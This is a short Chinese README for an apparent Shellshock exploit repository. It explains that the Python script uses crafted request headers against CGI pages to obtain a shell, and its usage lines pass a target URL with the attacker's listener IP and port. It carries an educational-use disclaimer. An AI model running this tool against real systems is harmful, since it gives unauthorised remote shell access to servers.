该仓库包含针对影响 Unix 系统的漏洞的利用代码。请注意,这仅是一个用于教育目的的概念验证脚本,应负责任地使用。
此利用代码旨在演示 Shellshock 攻击的工作原理,以及如何通过恶意构造的请求头获取系统 shell 访问权限。
此仓库仅用于教育目的。请勿将此代码或其中包含的任何信息用于恶意目的。始终遵守道德准则并尊重法律。
使用方法:
python3 shellshock.py [目标 URL] [本机 IP] [本机端口]
示例:
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
先决条件:
将本仓库克隆到本地机器。
git clone https://github.com/AlissonFaoli/Shellshock.git
进入项目目录。
cd Shellshock
运行 shellshock.py 脚本。
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi 监听接口IP 监听端口
此利用代码根据 MIT 许可证发布。您可以在 LICENSE 文件中找到更多信息。
如果您对此利用代码有任何问题或疑虑,请随时联系作者